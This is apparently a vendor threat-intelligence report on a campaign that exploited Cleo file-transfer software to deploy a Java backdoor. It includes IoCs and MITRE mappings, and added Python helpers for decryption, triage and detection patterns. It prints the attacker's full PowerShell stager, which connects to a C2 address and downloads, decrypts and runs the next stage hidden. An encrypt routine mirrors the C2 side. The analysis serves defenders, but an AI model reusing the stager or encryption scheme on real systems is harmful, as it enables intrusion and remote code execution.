Cleopatra’s Shadow: A Mass Exploitation Campaign Deploying a Java Backdoor Through Zero-Day Exploitation of Cleo MFT Software


Key Takeaways

  • Cleo MFT products were exploited by threat actors to deploy a malicious PowerShell stager, culminating in the execution of a Java-based backdoor we are dubbing Cleopatra.
  • The campaign began on 7 December 2024, and is ongoing as of the publication of this article.
  • The Cleopatra backdoor supports in-memory file storage and runs on both Windows and Linux. It implements functionality designed specifically to access data stored within Cleo MFT software.
  • Although many IP addresses were used as C2 destinations, vulnerability scanning originated from only two IP addresses.

Summary

In December 2024, Arctic Wolf Labs observed a mass exploitation campaign involving Cleo Managed File Transfer (MFT) products for initial access. The execution chain involved an obfuscated PowerShell stager, a Java loader, and ultimately a Java-based backdoor, which we will refer to as Cleopatra.

In this article we will provide insight into the execution chain in this campaign, obfuscated malicious payloads deployed, and surrounding threat intelligence context around these activities.

Background

In 2023, ransomware threat actors were seen exploiting CVE-2023-34362 against the MOVEit Transfer MFT solution. Considering the exposure of such services over the public internet and their proximity to sensitive data, it is easy to understand why this type of software would be attractive to ransomware threat actors. Indeed, in late 2023 we predicted that there would be additional exploitation of MFT solutions in the future for the same reasons.

On 30 October 2024, Cleo published an advisory for CVE-2024-50623, a vulnerability affecting Harmony, VLTrader, and LexiCom that allows unrestricted file upload and download on affected devices. This vulnerability was reportedly fixed in the 5.8.0.21 patch. However, organisations running the latest version of the software at the time of the intrusions were confirmed to have been affected in the present campaign, suggesting the existence of a separate means of initial access.

What We Know About the Campaign

Timeline and Victimology

Starting on December 7, Arctic Wolf began responding to a cluster of malicious PowerShell activity on devices running Cleo MFT software. All three of the products mentioned in the previous section were affected. The threat activity was spread across various industries and appears to have been opportunistic in nature.

Vulnerability Scanning

Across all known instances of exploitation, there were corresponding network flows originating from two IP addresses:

38.180.51.138 - Artnet Sp. Z O.O.
45.182.189.225 - Datahome S.A.

Traffic from these IP addresses reached victim environments on ports 5080, 5081, 6080, and 443, and most of it was TLS-encrypted. Consistent with independent reporting on the Cleo zero-day, the URI /synchronization was accessed over HTTP by both source IP addresses.

Following exploitation attempts, the URI /temp/webserver-UUID_REDACTED.swp was requested with HTTP GET from both IP addresses, although an HTTP 404 status was returned in every observed instance, indicating that no content was served. The UUID was in the standard RFC 4122 canonical format and is referenced within the malicious PowerShell script.

Vulnerability scanning began in earnest on December 7 and is ongoing as of this writing.

Cleo Exploitation

Exploitation is performed through the autorun feature available in each Cleo product. Threat actors drop a file within the autorun directory which is automatically interpreted and executed. The mechanics of exploitation are detailed in recent reporting.

Consistent with recent research by Huntress, we observed instances of healthcheck.txt and healthchecktemplate.txt files being created on affected devices. Notably, in this example log, the system is running version 5.8.0.21 of Cleo LexiCom, which was fully patched at the time of the intrusion.

Note: Processing autorun file ‘autorun\healthchecktemplate.txt’.
Warning: Lexicom is version 5.8.0.21, but importing files from VersaLex with an unknown version.
Note: Import started for ‘temp\LexiCom##########.tmp’.
Note: Importing ‘hosts\main.xml’ (4,500 kBytes)…
Note: Import complete.
Note: Processing autorun file ‘autorun\healthcheck.txt’
Run: type=“AutoRun”
Command: SYSTEM cmd.exe /c "powershell -NonInteractive -EncodedCommand TRUNCATED_BASE64"
Detail: SYSTEM cmd.exe /c "powershell -NonInteractive -EncodedCommand TRUNCATED_BASE64"
Result: “Success” “Return status=0”
End

As shown in the log above, this activity culminates in the execution of a malicious PowerShell script which we’ll review in the following section.

PowerShell Stager

In the intrusions we reviewed, execution of an obfuscated PowerShell or Bash script was observed. An example of an injected PowerShell script is shown below, executed as a shell command through cmd.exe /c:

cmd.exe /c \"powershell -NonInteractive $c=New-Object Net.Sockets.TcpClient("67.220.94.173", 443)
$s=$c.GetStream()
$s.ReadTimeout=10000
$w=New-Object System.IO.StreamWriter $s
$w.WriteLine("TLS v3 REDACTED_BASE64_UNIQUE_STRING")
$w.Flush()
$k=49,121,229,229,170,202,13,126,97,195,155,101,225,76,51,84
$a=New-Object System.Byte[] 9999
$f="cleo.3622"
$t=New-Object IO.FileStream($f, [IO.FileMode]::Create)
$n=$g=0
while(1){$r=$s.Read($a,0,9999)
if($r -le 0){break}
for($i=0;$i -lt $r;$i++){$j=$n++ -band 15
$a[$i]=$a[$i] -bxor $k[$j] -bxor $g
$g=($g+$a[$i]) -band 255
$k[$j]=($k[$j]+3) -band 255}
$t.Write($a,0,$r)}
$t.Close()
$w.Close()
$s.Close()
$env:QUERY=""
$env:F=$f
Start-Process -WindowStyle Hidden -FilePath jre\bin\java.exe -ArgumentList "-jar $f"
\" &gt; webserver/temp/webserver-UUID_REDACTED.swp

This script performs the following actions:

  1. Opens a TCP connection to the C2 server on port 443 (the IP address varies from intrusion to intrusion).
  2. Sends the hello line TLS v3 REDACTED_BASE64_UNIQUE_STRING to the C2 server, flushes the buffer, and then reads the response stream until the socket returns no more data. The response is the next stage, a Java loader.
  3. Decrypts the stream as it is read. Each observed script carries its own 16-byte key, but the scheme is not a plain repeating-key XOR: each byte is XORed with the key byte at position n mod 16 and with a running feedback byte $g, $g is then updated with the decrypted byte, and the key byte that was just used is incremented by 3 (mod 256). The keystream therefore changes continuously over the length of the payload.
  4. Sets the environment variable QUERY (empty in the sample above; in the intrusions it carried a unique encoded string that the Java loader consumes) and the environment variable F to the value of $f, which follows the pattern cleo.####.
  5. Writes the decrypted stage to the file named by $f (cleo.3622 here, with no .jar extension) and launches it hidden via the relative path jre\bin\java.exe -jar $f, resolved against the Cleo service's working directory.

The last line of the script appears to be an attempt to redirect the command's output to a file that the threat actor could later retrieve over HTTP. Because the right-angle bracket character > was escaped as an HTML entity, the redirection never takes place, which likely explains why attempts to retrieve the file returned a 404 in the observed HTTP activity.
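The decryption loop in the stager is compact but easy to misread as a simple repeating-key XOR. The Python below is an added example (it is not code from the original article, nor the threat actor's) that reimplements the loop byte for byte so that a responder can decrypt a stage carved from a packet capture, together with the inverse operation so the decoder can be exercised without live C2 traffic. The key is the one from the sample above; the stand-in JAR it round-trips is constructed here and is not the real loader.

```python
from __future__ import annotations

import io
import zipfile
from typing import Optional

# 16-byte key from the stager sample above; every observed script carries its own.
SAMPLE_KEY = [49, 121, 229, 229, 170, 202, 13, 126, 97, 195, 155, 101, 225, 76, 51, 84]


def stager_decrypt(ciphertext: bytes, key: list[int]) -> bytes:
    """Mirror the stager's read loop: rolling XOR with per-byte key rotation and feedback."""
    k = list(key)          # working copy: key bytes mutate as the stream advances
    g = 0                  # feedback byte, a running sum of the plaintext produced so far
    out = bytearray(len(ciphertext))
    for n, c in enumerate(ciphertext):
        j = n & 15                      # $j = $n++ -band 15
        p = c ^ k[j] ^ g                # $a[$i] = $a[$i] -bxor $k[$j] -bxor $g
        out[n] = p
        g = (g + p) & 0xFF              # $g = ($g + $a[$i]) -band 255
        k[j] = (k[j] + 3) & 0xFF        # $k[$j] = ($k[$j] + 3) -band 255
    return bytes(out)


def stager_encrypt(plaintext: bytes, key: list[int]) -> bytes:
    """Inverse of stager_decrypt, i.e. what the C2 server must do before sending a stage."""
    k = list(key)
    g = 0
    out = bytearray(len(plaintext))
    for n, p in enumerate(plaintext):
        j = n & 15
        out[n] = p ^ k[j] ^ g
        g = (g + p) & 0xFF              # feedback is driven by the plaintext byte, as on the receiving side
        k[j] = (k[j] + 3) & 0xFF
    return bytes(out)


def looks_like_jar(payload: bytes) -> bool:
    """A correctly decrypted stage should be a ZIP container (local file header magic PK\\x03\\x04)."""
    return payload[:4] == b"PK\x03\x04" and zipfile.is_zipfile(io.BytesIO(payload))


def build_fake_stage() -> bytes:
    """Constructed stand-in for the loader JAR: a ZIP holding one placeholder manifest."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\nMain-Class: Main\n")
    return buf.getvalue()


def recover_stage(captured_stream: bytes, key: list[int]) -> Optional[bytes]:
    """Decrypt a captured TCP payload (e.g. carved from a PCAP) and sanity-check the result."""
    stage = stager_decrypt(captured_stream, key)
    return stage if looks_like_jar(stage) else None


if __name__ == "__main__":
    wire = stager_encrypt(build_fake_stage(), SAMPLE_KEY)   # what would cross the network
    print("ciphertext starts with:", wire[:4].hex())
    print("recovered JAR:", recover_stage(wire, SAMPLE_KEY) is not None)
```

Because the feedback byte depends on every plaintext byte before it, a single corrupted or missing byte in the capture garbles everything that follows; the ZIP-magic check in recover_stage is a cheap way to confirm the stream was reassembled correctly before spending time on the JAR.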

Java Loader

The Java loader reads the $QUERY environment variable set by the PowerShell stager, replaces several characters, and base64-decodes it. The decoded data is structured as follows:

  • The first 16 bytes contain the AES key used to decrypt the final stage.
  • The next 16 bytes are a unique seed that is base64-encoded and sent to the C2 server.

These bytes are sent in the same format as the stager's hello line, TLS v3 REDACTED_BASE64_UNIQUE_STRING.

The payload is then downloaded from the C2 server and decrypted with AES in CBC mode, using the extracted key and the following hardcoded initialisation vector (shown as Java signed bytes, as in the decompiled source):

aes_iv = { -51, 74, 84, -79, -108, -28, -118, 102, -47, -30, 93, -91, -111, 9, -48, 65 }

The downloaded payload is passed to a custom class that unzips it and loads nine Java classes into a HashMap. These decrypted classes are the final stage, executed at the end of the loader's run.

Once the final stage is unzipped and held in memory, the loader begins erasing the downloaded file cleo.####.jar by overwriting its entire contents with NULL bytes, a defence evasion technique intended to frustrate forensic recovery of the file. The file is ultimately deleted from disk by the final stage.

Finally, the loader locates the class named Cli, obtains its constructor, and instantiates it to run the final payload. The Cli constructor takes three arguments:

// initial_C2:     67.220.94.173
// unique_id:      VICTIM_IP_REDACTED_6080
// cleo_file_name: name of the dropped loader file (cleo.####)

constructor.newInstance(new Object[] { initial_C2, unique_id, cleo_file_name });

The initial_C2 and unique_id values were parsed from the base64-encoded string stored in the $QUERY environment variable earlier. The observed unique_id value was the victim machine's public IP address followed by four digits (VICTIM_IP_REDACTED_6080 above).
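To turn the description above into something usable during analysis, the Python below is an added example (it is neither the loader's code nor code from this article) covering the parts the page does specify: the Java signed-byte IV converted to raw bytes, the key/seed split of the decoded QUERY value, the hello line, and the unique_id format. The character substitution the loader applies before base64-decoding is not described here, so parse_query assumes URL-safe base64 without padding, and decrypt_stage assumes PKCS#7 padding (Java's AES/CBC/PKCS5Padding); both are marked as assumptions in the code, and all function names are this example's own.

```python
from __future__ import annotations

import base64
import re
from typing import Optional

# Hardcoded IV exactly as it appears in the decompiled loader (Java signed bytes).
JAVA_AES_IV = [-51, 74, 84, -79, -108, -28, -118, 102, -47, -30, 93, -91, -111, 9, -48, 65]


def java_bytes(signed: list[int]) -> bytes:
    """Convert a Java byte[] literal (values -128..127) to raw bytes."""
    return bytes(b & 0xFF for b in signed)


def iv_yara_hex() -> str:
    """The IV as a spaced hex string, ready to drop into a YARA hex pattern."""
    return " ".join(f"{b:02X}" for b in java_bytes(JAVA_AES_IV))


def encode_query(key: bytes, seed: bytes) -> str:
    """Build a QUERY value in the form parse_query expects (used here only to exercise the parser)."""
    return base64.urlsafe_b64encode(key + seed).decode("ascii").rstrip("=")


def parse_query(query: str) -> tuple[bytes, bytes]:
    """Split the decoded QUERY blob into the 16-byte AES key and the 16-byte seed.

    Assumption: the character substitution the loader performs before decoding is not
    described in the article, so URL-safe base64 without padding is assumed here.
    """
    raw = base64.urlsafe_b64decode(query + "=" * (-len(query) % 4))
    if len(raw) < 32:
        raise ValueError("QUERY too short: expected 16 key bytes followed by 16 seed bytes")
    return raw[:16], raw[16:32]


def hello_line(seed: bytes) -> str:
    """Hello message in the format shared by the stager and the loader."""
    return "TLS v3 " + base64.b64encode(seed).decode("ascii")


UNIQUE_ID_RE = re.compile(r"^(\d{1,3}(?:\.\d{1,3}){3})_(\d{4})$")


def parse_unique_id(unique_id: str) -> Optional[tuple[str, str]]:
    """unique_id = <victim public IP>_<four digits>; returns (ip, digits) or None."""
    m = UNIQUE_ID_RE.match(unique_id)
    return (m.group(1), m.group(2)) if m else None


def decrypt_stage(key: bytes, ciphertext: bytes) -> bytes:
    """AES-CBC decrypt a downloaded stage with the loader's fixed IV (requires the 'cryptography' package).

    Assumption: PKCS#7 padding, i.e. Java's AES/CBC/PKCS5Padding; the article names only AES/CBC.
    """
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    dec = Cipher(algorithms.AES(key), modes.CBC(java_bytes(JAVA_AES_IV))).decryptor()
    padded = dec.update(ciphertext) + dec.finalize()
    unpad = padding.PKCS7(128).unpadder()
    return unpad.update(padded) + unpad.finalize()


if __name__ == "__main__":
    key, seed = parse_query(encode_query(b"K" * 16, b"S" * 16))   # constructed values
    print(hello_line(seed))
    print("iv:", iv_yara_hex())
    print(parse_unique_id("203.0.113.10_6080"))                   # constructed, RFC 5737 address
```

Because the IV is a constant, its 16-byte pattern is a usable static signature for the loader class files even when the AES key differs per victim; iv_yara_hex() prints it in the form a YARA hex string takes.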

Cleopatra Backdoor

We have dubbed the final Java payload Cleopatra Backdoor based on its Cleo-specific functionality.

The final stage payload consists of nine different Java classes:

  • Cli
  • Dwn
  • DwnLevel
  • Mos
  • Proc
  • ScSlot
  • SFile
  • Slot
  • SrvSlot

The entry point to this malware is the constructor of the Cli class, which receives cleo_file_name as var3 and deletes that file completely from disk using PowerShell (runDelFileCmd). The this.host field takes the initial_C2 value passed in by the Java loader and uses it for further communication through the SrvSlot, ScSlot and Slot classes.

The cliid variable holds the unique_id value from the Java loader; it is sent as the "sid" field in the hello packet to the C2 server.

public Cli(String var1, String var2, String var3) {
    try {
        this.host = var1;
        cliid = var2;
        stage1fn = var3;
        this.run();
        runDelFileCmd(var3);
    } catch (Exception var5) {
        l("EX Cli " + var5.getMessage());
    }
}

We identify a few notable capabilities within the decompiled backdoor source:

  • The Proc class provides "shell" access on Linux and Windows hosts. It uses either cmd /c or bash -c and can execute a single command or run a "remote shell", where it loops continuously and pipes the commands' input and output streams over the C2 channel.
  • The Dwn and DwnLevel classes handle the in-memory file storage, which can create zip containers and read from and write to them.
  • The SFile class reads and writes files on disk.

The Cleopatra backdoor contains a few other noteworthy filesystem references that are specific to Cleo software.

  • Within the Proc class, a method called confParser() parses a file in conf/Top.xml. This method is used to gather a list of hosts and subdirectories of potential interest to the threat actor. The list of identified hosts is saved to hosts/hostfile for ease of retrieval. All subdirectories are stored in a HashMap and identified home directory paths are returned as output via the C2 interface. The list of subdirectories is:
    • Defaulthomedir
    • Ftprootpath
    • Inbox
    • Sentbox
    • Outbox
    • Mailbox
  • Within the Proc class, a method called loadOptions() parses a configuration file in conf/Options.xml, which is specific to Cleo software as documented in Cleo’s Versalex Administrator Guide. The parsed parameters are stored in a HashMap object. This method is called from the confParser() method.
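The loader and backdoor leave several file system traces that this article names: the autorun files, the webserver-UUID.swp redirect target, the cleo.#### loader file (NULL-filled before it is deleted), and the hosts/hostfile list written by confParser(). The Python below is an added triage helper (not Arctic Wolf's tooling and not code from the article) that checks a Cleo install directory for those artifacts and pulls the six directory settings out of a Top.xml document. The Top.xml schema is not described on this page, so cleo_data_dirs is a generic walk over element tags and attribute names, and both the XML and the directory tree it runs on are constructed samples.

```python
from __future__ import annotations

import re
import tempfile
import xml.etree.ElementTree as ET  # for XML you do not control, prefer defusedxml
from pathlib import Path

# Artifacts named in this article, relative to the Cleo product's install/working directory.
AUTORUN_NAMES = {"healthcheck.txt", "healthchecktemplate.txt"}
SWP_RE = re.compile(r"^webserver-[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}\.swp$", re.I)
LOADER_RE = re.compile(r"^cleo\.\d{4}(\.jar)?$")
HOSTFILE = Path("hosts") / "hostfile"
# Directory settings the backdoor's confParser() collects from conf/Top.xml.
DATA_DIR_KEYS = {"defaulthomedir", "ftprootpath", "inbox", "sentbox", "outbox", "mailbox"}


def triage_cleo_dir(root: Path) -> list[str]:
    """Report on-disk traces of the stager, loader and backdoor under a Cleo install directory."""
    findings: list[str] = []
    # 1. Autorun files that triggered the PowerShell stager.
    autorun = root / "autorun"
    if autorun.is_dir():
        for f in autorun.iterdir():
            if f.name.lower() in AUTORUN_NAMES:
                findings.append(f"autorun artifact: {f.relative_to(root).as_posix()}")
    # 2. Redirect target the actor tried to fetch over HTTP (404 in the observed intrusions).
    temp = root / "webserver" / "temp"
    if temp.is_dir():
        for f in temp.iterdir():
            if SWP_RE.match(f.name):
                findings.append(f"stager output file: {f.relative_to(root).as_posix()}")
    # 3. Loader file dropped by the stager; the loader NULL-fills it before the final stage deletes it.
    for f in root.iterdir():
        if f.is_file() and LOADER_RE.match(f.name):
            size = f.stat().st_size
            zeroed = size > 0 and f.read_bytes().count(0) == size
            findings.append(f"loader file: {f.name} ({size} bytes{', NULL-filled' if zeroed else ''})")
    # 4. Host list written by the backdoor's confParser(); confirm it is not part of your own deployment.
    if (root / HOSTFILE).is_file():
        findings.append(f"backdoor host list: {HOSTFILE.as_posix()}")
    return findings


def cleo_data_dirs(top_xml: str) -> dict[str, list[str]]:
    """Collect the six directory settings confParser() looks for, from a Top.xml document.

    Assumption: the real Top.xml schema is not described in the article, so this is a
    generic walk matching element tags and attribute names case-insensitively.
    """
    found: dict[str, list[str]] = {k: [] for k in DATA_DIR_KEYS}
    for el in ET.fromstring(top_xml).iter():
        tag = el.tag.rsplit("}", 1)[-1].lower()          # strip any namespace prefix
        if tag in found and (el.text or "").strip():
            found[tag].append(el.text.strip())
        for attr, val in el.attrib.items():
            if attr.lower() in found and val.strip():
                found[attr.lower()].append(val.strip())
    return {k: v for k, v in found.items() if v}


# Constructed sample; this is not Cleo's real Top.xml format.
SAMPLE_TOP_XML = """<?xml version="1.0"?>
<Top>
  <Host alias="partner-a" Defaulthomedir="C:/Cleo/home/partner-a">
    <Inbox>inbox</Inbox><Outbox>outbox</Outbox>
  </Host>
  <Options Ftprootpath="C:/Cleo/ftproot"/>
</Top>
"""


def demo() -> list[str]:
    """Build a constructed install tree in a temporary directory and triage it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "autorun").mkdir()
        (root / "autorun" / "healthcheck.txt").write_text("sample autorun content\n")
        (root / "webserver" / "temp").mkdir(parents=True)
        (root / "hosts").mkdir()
        (root / "hosts" / "hostfile").write_text("partner-a\n")
        (root / "cleo.3622").write_bytes(b"\x00" * 64)     # loader after the NULL-fill step
        return triage_cleo_dir(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
    print(cleo_data_dirs(SAMPLE_TOP_XML))
```

The directory values recovered by cleo_data_dirs are the same ones the backdoor reports back to its operator, so they double as the scope for a data exposure assessment: whatever sat in those inbox, outbox and home directories was reachable through the Proc and SFile classes.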

Discovery Commands

In the intrusions, basic discovery commands were utilised, such as the ones seen below:

  • whoami
  • systeminfo
  • nltest /domain_trusts
  • net view
  • net session
  • wmic logicaldisk get name,size

The commands listed were used by threat actors to gather information on the compromised host device as well as network connections that may be leveraged for pivoting to other devices.

How Arctic Wolf Protects Its Customers

Arctic Wolf is committed to helping customers end their cyber risk, and when active ransomware campaigns are identified we move quickly to protect our customers. From the beginning of this campaign, Arctic Wolf acted decisively to mitigate the risks to our customers.

Arctic Wolf Labs has leveraged threat intelligence around CVE-2024-50623 and related tactics from previous campaigns to implement new detections in the Aurora Platform to protect Arctic Wolf® Managed Detection and Response (MDR) customers. As we discover new information, we will enhance our detections to account for additional indicators of compromise and techniques leveraged by this threat actor.

Conclusion

As we predicted in 2023, MFT software continues to be an attractive target to threat actors in 2024. Considering the recent public disclosure of a proof-of-concept exploit for the Cleo zero-day vulnerability, exploitation is now expected to become more widespread. Now that a fix is available, organisations running Cleo software should upgrade to version 5.8.0.24 or newer as soon as possible.

Defenders should prioritise remote monitoring of server assets for unusual execution patterns (such as obfuscated PowerShell activity) to respond early in the execution chain before threat actors can act on their objectives.

Additionally, devices should be continuously audited for potential weaknesses in internet-accessible services, and vulnerable services should be kept off the public internet where possible to minimise the potential exposure in mass exploitation campaigns such as this one. This can be accomplished by IP access control lists, or by keeping applications behind a VPN to reduce the potential attack surface.

Acknowledgements

Arctic Wolf Labs would like to acknowledge members of the Security Services team for their role in identifying this campaign. We thank Cole Bosma who identified the campaign and associated TTPs, as well as Osaze Omoruyi and Mark Funcion who helped investigate the intrusions.

Appendix

Tactics, Techniques, and Procedures (TTPs)

Tactic          Technique                                    Sub-techniques or Tools
Initial Access  T1190: Exploit Public-Facing Application     Cleo autorun directory
Execution       T1059: Command and Scripting Interpreter     cmd.exe /c, powershell -EncodedCommand
Discovery       T1082: System Information Discovery          systeminfo; wmic logicaldisk get name,size
Discovery       T1033: System Owner/User Discovery           whoami
Discovery       T1482: Domain Trust Discovery                nltest /domain_trusts
Discovery       T1135: Network Share Discovery               net view
Discovery       T1049: System Network Connections Discovery  net session

Vulnerabilities Exploited

Vulnerability   Use
Undeclared CVE  The threat actor has been observed exploiting a vulnerability with an undeclared CVE (related to CVE-2024-50623) for initial access.

Indicators of Compromise (IoCs)

Indicator                                                          Type          Description
185.181.230[.]115                                                  IPv4 Address  AS60602 – Inovare-Prim Srl; C2 Server
80.67.5[.]133                                                      IPv4 Address  AS42708 – Glesys Ab; C2 Server
5.181.158[.]25                                                     IPv4 Address  AS39798 – Mivocloud Srl; C2 Server
188.214.30[.]105                                                   IPv4 Address  AS51177 – Tipzor Media Srl; C2 Server
216.245.221[.]83                                                   IPv4 Address  AS46475 – Limestone Networks Inc.; C2 Server
176.123.4[.]50                                                     IPv4 Address  AS200019 – Alexhost Srl; C2 Server
185.162.128[.]133                                                  IPv4 Address  AS14576 – Hosting Solution Ltd.; C2 Server
184.107.3[.]70                                                     IPv4 Address  AS32613 – Leaseweb Canada Inc.; C2 Server
45.140.143[.]68                                                    IPv4 Address  AS212477 – Royalehosting Bv; C2 Server
195.123.224[.]8                                                    IPv4 Address  AS59729 – Green Floid Llc; C2 Server
184.107.3[.]196                                                    IPv4 Address  AS32613 – Leaseweb Canada Inc.; C2 Server
92.51.2[.]221                                                      IPv4 Address  AS209588 – Flyservers S.A.; C2 Server
67.220.94[.]173                                                    IPv4 Address  AS40065 – Cnservers Llc; C2 Server
192.119.99[.]42                                                    IPv4 Address  AS54290 – Hostwinds Llc.; C2 Server
185.162.128[.]100                                                  IPv4 Address  AS14576 – Hosting Solution Ltd.; C2 Server
5.149.254[.]109                                                    IPv4 Address  AS59711 – Hz Hosting Ltd; C2 Server
92.51.2[.]244                                                      IPv4 Address  AS209588 – Flyservers S.A.; C2 Server
95.216.35[.]219                                                    IPv4 Address  AS24940 – Hetzner Online Gmbh; C2 Server
45.182.189[.]225                                                   IPv4 Address  AS273045 – Datahome S.A.; Vulnerability Scanner and C2 Server
38.180.51[.]138                                                    IPv4 Address  AS200088 – Artnet Sp. Z O.O.; Vulnerability Scanner and C2 Server
6705EEA898EF1155417361FA71B1078B7AAAB61E7597D2A080AA38DF4AD87B1C   SHA256        Java Loader (cleo.####.jar)
healthcheck.txt                                                    Filename      Malicious Cleo autorun filename
healthchecktemplate.txt                                            Filename      Malicious Cleo autorun filename

Detection Opportunities

As part of our MDR service, Arctic Wolf has detections in place for techniques described in this blog article, in addition to other techniques employed by threat actors described here.

Network

Network detection is challenging considering that MFT services typically run with TLS encryption enabled, as opposed to plaintext HTTP. On the other hand, organisations that do not expect traffic from the network providers or IP addresses in the IoC table above can consider alerting on such traffic regardless of whether its contents are encrypted.

Note that all C2 server IP addresses were confirmed to originate from ASNs classified as hosting, as opposed to consumer ISPs.

Endpoint

There are several potential detection opportunities for this threat at the endpoint level. Encoded and obfuscated PowerShell should be treated with suspicion, with filtering in place for expected activities that fit this description.

Additionally, unexpected processes spawned from child processes of the Java-hosted Cleo services should be highlighted for potential exploitation activity.
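As an added example (not an Arctic Wolf detection, and not code from this article), the Python below applies both endpoint ideas to a constructed set of process-creation events: it decodes -EncodedCommand payloads (base64 of the UTF-16LE script) and scans them for stager traits seen above, such as Net.Sockets.TcpClient and -bxor, and it walks the parent chain to determine whether a shell or discovery process descends from the Cleo Java service. The event schema, the assumption that the product name appears on the java.exe command line, the severity tiers and the sample events are this example's own and would need adapting to a real EDR's telemetry.

```python
from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record. Field names are this example's own, not any EDR's schema."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Assumption: the Cleo product name appears on the service's java.exe command line.
CLEO_JAVA_RE = re.compile(r"javaw?\.exe.*(?:LexiCom|VLTrader|Harmony)", re.I)
# Traits of the stager shown in this article: raw TCP client, rolling XOR, file drop, java launch.
STAGER_RE = re.compile(r"Net\.Sockets\.TcpClient|-bxor|FileMode\]::Create|Start-Process.*java\.exe", re.I)
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe", "bash", "sh"}
DISCOVERY_IMAGES = {"whoami.exe", "systeminfo.exe", "nltest.exe", "net.exe", "net1.exe", "wmic.exe"}


def encode_ps(script: str) -> str:
    """What PowerShell expects after -EncodedCommand: base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> str | None:
    """Return the decoded -EncodedCommand script, or None if there is none or it is malformed."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def is_cleo_descendant(ev: ProcEvent, by_pid: dict[int, ProcEvent], max_depth: int = 5) -> bool:
    """Walk the parent chain looking for the Cleo Java service."""
    cur = ev
    for _ in range(max_depth):
        parent = by_pid.get(cur.ppid)
        if parent is None:
            return False
        if parent.image.lower().startswith("java") and CLEO_JAVA_RE.search(parent.cmdline):
            return True
        cur = parent
    return False


def detect(events: list[ProcEvent]) -> list[dict]:
    """Tiered alerts: stager content = high; shells under Cleo = medium or high; other encoded PS = low."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for ev in events:
        image = ev.image.lower()
        decoded = decode_encoded_command(ev.cmdline)
        script_text = ev.cmdline + ("\n" + decoded if decoded else "")
        stager_like = STAGER_RE.search(script_text) is not None
        under_cleo = is_cleo_descendant(ev, by_pid)
        if under_cleo and (image in SHELL_IMAGES or image in DISCOVERY_IMAGES):
            sev = "high" if stager_like else "medium"
            reason = "shell or discovery process descended from the Cleo Java service"
        elif stager_like:
            sev, reason = "high", "stager-like PowerShell content"
        elif decoded is not None and "powershell" in image:
            sev, reason = "low", "encoded PowerShell; allowlist known administrative sources"
        else:
            continue
        alerts.append({"pid": ev.pid, "image": ev.image, "severity": sev, "reason": reason, "decoded": decoded})
    return alerts


# Constructed events. 203.0.113.5 is an RFC 5737 documentation address, not a real C2.
STAGER_SNIPPET = '$c=New-Object Net.Sockets.TcpClient("203.0.113.5", 443);$s=$c.GetStream()'
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "java.exe", r"D:\LexiCom\jre\bin\java.exe -jar LexiCom.jar -s service"),
    ProcEvent(200, 100, "cmd.exe", f'cmd.exe /c "powershell -NonInteractive -EncodedCommand {encode_ps(STAGER_SNIPPET)}"'),
    ProcEvent(300, 200, "powershell.exe", f"powershell -NonInteractive -EncodedCommand {encode_ps(STAGER_SNIPPET)}"),
    ProcEvent(400, 1, "svchost.exe", "svchost.exe -k netsvcs -p -s Schedule"),
    ProcEvent(500, 400, "powershell.exe", f"powershell -EncodedCommand {encode_ps('Get-Date')}"),  # benign task
    ProcEvent(600, 100, "cmd.exe", "cmd.exe /c whoami"),                                          # discovery under Cleo
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["severity"], a["pid"], a["image"], "-", a["reason"])
```

Scanning the cmd.exe event as well as the powershell.exe event matters: in the autorun log above the whole encoded command is visible on the cmd.exe /c line, so the rule still fires even where the child PowerShell process is not recorded. The sample stager script in this article is not encoded at all, which is why the content check runs on the raw command line too.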

As part of our Managed Detection and Response service, Arctic Wolf has detections in place for this technique, in addition to other techniques employed by this threat actor.

Additional Resources

Get actionable insights and access to the security operations expertise of one of the largest security operations centers (SOCs) in the world in Arctic Wolf’s 2024 Security Operations Report.

Learn what’s new, what’s changed, and what’s ahead for the cybersecurity landscape, with insights from 1,000 global IT and security leaders in the Arctic Wolf State of Cybersecurity: 2024 Trends Report.

About Arctic Wolf Labs

Arctic Wolf Labs is a group of elite security researchers, data scientists, and security development engineers who explore security topics to deliver cutting-edge threat research on new and emerging adversaries, develop and refine advanced threat detection models with artificial intelligence, including machine learning, and drive continuous improvement in the speed, scale, and detection efficacy of Arctic Wolf’s solution offerings. With their deep domain knowledge, Arctic Wolf Labs brings world-class security innovations to not only Arctic Wolf’s customer base, but the security community at large.

Authors

Stefan Hostetler

Stefan is a Lead Threat Intelligence Researcher at Arctic Wolf. With over a decade of industry experience under his belt, he focuses on extracting actionable insight from novel threats to help organisations protect themselves effectively.

Julian Tuin

Julian is a Senior Threat Intelligence Researcher at Arctic Wolf Labs with more than 6 years of industry experience. He has experience in identifying and tracking campaigns for new and emerging threats.

Aaron Diaz

Aaron is a Lead Security Researcher at Arctic Wolf Labs focusing on malware analysis and detection research. He has more than 8 years of experience in the industry with a background in threat hunting, malware analysis/development and vulnerability research. Aaron has passion for novel threat research and adversary tradecraft.

Jon Grimm

Jon is a Threat Intelligence Analyst at Arctic Wolf dedicated to identifying new cyber threats and producing actionable intelligence that enhances organisational defenses. He has a background of 10 years’ experience in several domains of cybersecurity, holds a bachelor’s degree in law enforcement, and holds several industry certifications (CISSP, GCFA, GCTI).

Cole Bosma

